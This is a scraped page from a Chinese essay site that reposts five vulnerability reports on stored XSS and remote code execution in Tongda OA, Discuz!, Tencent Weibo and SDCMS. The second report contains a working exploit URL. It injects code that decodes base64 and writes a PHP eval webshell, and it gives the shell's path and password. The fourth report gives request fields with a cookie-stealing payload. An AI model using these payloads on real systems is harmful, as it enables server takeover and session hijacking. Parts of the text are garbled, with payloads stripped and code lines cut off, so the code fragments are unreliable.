欢迎来到个人简历网!永久域名:gerenjianli.cn (个人简历全拼+cn)
当前位置:首页 > 范文大全 > 实用文>通达OA日志内容存储型XSS 可获取cookie漏洞预警

通达OA日志内容存储型XSS 可获取cookie漏洞预警

2023-06-16 09:04:43 收藏本文 下载本文

“爹只是小号罢了”通过精心收集,向本站投稿了5篇通达OA日志内容存储型XSS 可获取cookie漏洞预警,下面是小编为大家整理后的通达OA日志内容存储型XSS 可获取cookie漏洞预警,以供大家参考借鉴!

通达OA日志内容存储型XSS 可获取cookie漏洞预警

篇1:通达OA日志内容存储型XSS 可获取cookie漏洞预警

通达OA和版本,Office Anywhere 2013工作日志编辑页面存在存储型XSS,上级领导查看日志后能,可窃取到cookie

1、工作日志编辑页面 源码 绕过bypass 字符可构造XSS!

1、截取到得cookie​

2、利用Cookie Injector 在支持同源策略条件下,替换cookie 登陆到Cookie用户ceshi2.

修复方案:

1、工作日志内容编辑页面过滤

2、http-only

篇2:通达OA 2013 通杀GETSHELL修复补丁漏洞预警

此程序通篇的gbk编码是他的硬伤, 基本上80%的SQL语句都能控制, 但是由于在进入数据库的时候检测了select和union, 而且此程序加密方式也很 , 所以注入方面就不考虑了.

EXP:

第一步: [GET]site/general/crm/studio/modules/EntityRelease/release.php?entity_name=1%d5'%20or%20sys_function.FUNC_ID=1%23%20${%20fputs(fopen(base64_decode(c2hlbGwucGhw),w),base64_decode(PD9waHAgQGV2YWwoJF9QT1NUW2NdKTsgPz5vaw))}

第二步: [GET]site/general/email/index.php

SHELL: site/general/email/shell.php 密码C

此程序写的非常乱, 不知道是因为解密后的原因还是程序员本身就这样写的, 还有几处不需要登录的通杀getshell, 这里就不发了, 危害大了不好

有心的同学可以自己读读, 很容易就发现的 o(∩_∩)o ~~

篇3:discuz! 7.* 存储型xss漏洞预警

发帖flash 地址处过滤不严,导致存储型xss,

document.write(AC_FL_RunContent('width', '550', 'height', '400', 'allowNetworking', 'internal', 'allowScriptAccess', 'never', 'src', 'aaaaaaaaaaaaa', 'quality', 'high', 'bgcolor', '#ffffff', 'wmode', 'transparent', 'allowfullscreen', 'true'));

如上,有一处输出在js 中,如果单引号没有过滤的话...

修复方案:

www.discuz.net/thread-3241166-1-1.html

篇4: 私信存储型XSS跨站漏洞漏洞预警

漏洞标题: 私信存储型XSS跨站漏洞

漏洞类型:xss跨站脚本攻击

危害等级:高

简要描述:

最近大家都流行连载了,

私信存储型XSS跨站漏洞漏洞预警

。那么我们也开场吧~最近心伤的胖子一直在连载,不知道发重复了没。

详细说明:

漏洞成因:

缺陷文件:

mat1.gtimg.com/www/mb/js/mi_121016.js

1.首先进入MI.TalkList.picEvent函数

MI.TalkList.picEvent=function(a){

....

其中a为页面中所有class为PicBox的div集合,即div.PicBox

2.循环每一个class为PicBox的div

for(varb=0,f=a.length;b

varg=a[b],

....

g为每个div

3.k=c(g,“img”)[0],获取PicBox里的第一个img图片

4.h=k.parentNode,获取k的父级元素,是一个链接

5.j=c(g,“.picTools”),获取PicBox这个div里的picToolsDIV

6.缺陷在下面这几句JS代码

if(!MI.user.fun.wideStyle)

MI.tmpl.picTool=['',_(“向左转”),'|',_(“向右转”),'',_(“查看原图”),“

”].join(“”);

UI.before(UI.html(MI.tmpl.picTool.replace(“$Url”,h.href.replace(/\/460$/g,“”)).replace(“$hisUrl”,l))[0],h);

MI.tmpl.picTool直接将$Url替换为h.href

而h在取href属性值时,会自动将“等转换回”,<,>等符号,

----------------------------------

结合实际HTML结构,如下:

k对应用户发送的图片

h对应k外层的A标签

...

h.href中的“<,>等重新转义回了”,<,>

最终导致UI.html(MI.tmpl.picTool.replace(“$Url”,h.href.replace(/\/460$/g,“”)).replace(“$hisUrl”,l))[0],h)

在输出HTML时,导致XSS出现

--------------------------------

利用方法,发送私信时,

api.t.qq.com/inbox/pm_mgr.php

sourcereply

ptidgainover

roomid

content.................

fid

arturlt2.qpic.cn/mblogpic/4955e75656b3d175296c/460#“>

(document.cookie);” style=“display:none”>

murl

targetgainover

funcsend

efjs

pmlangzh_CN

apiType8

apiHostapi.t.qq.com

漏洞证明:

对方打开私信时会触发XSS。

修复方案:

MI.TalkList.picEvent中 h.href.replace之前先将h.href转义一次~

篇5:SDCMS某处存储型xss可劫持管理员漏洞预警

SDCMS某处存储型xss,可跨进后台直接劫持管理员

问题还是在短消息处,

SDCMS某处存储型xss可劫持管理员漏洞预警

之前SDCMS短消息处存在xss可以直接劫持任意指定用户,这个bug修改了,但是没有修复完全,这次来个更狠的,直接劫持管理员账户。

首先,我们发送短消息给任意存在的用户,这里我们用222222给111111账户发消息:

发送的内容我们填写

">

管理员后台查看后会触发

【通达OA日志内容存储型XSS 可获取cookie漏洞预警】相关文章:

1.QQ空间存储xss漏洞一枚可打到cookie(含修复)

下载word文档
《通达OA日志内容存储型XSS 可获取cookie漏洞预警.doc》
将本文的Word文档下载到电脑,方便收藏和打印
推荐度: 评级1星 评级2星 评级3星 评级4星 评级5星
点击下载文档

文档为doc格式

通达OA日志内容存储型XSS 可获取cookie漏洞预警相关文章
最新推荐
猜你喜欢
  • 返回顶部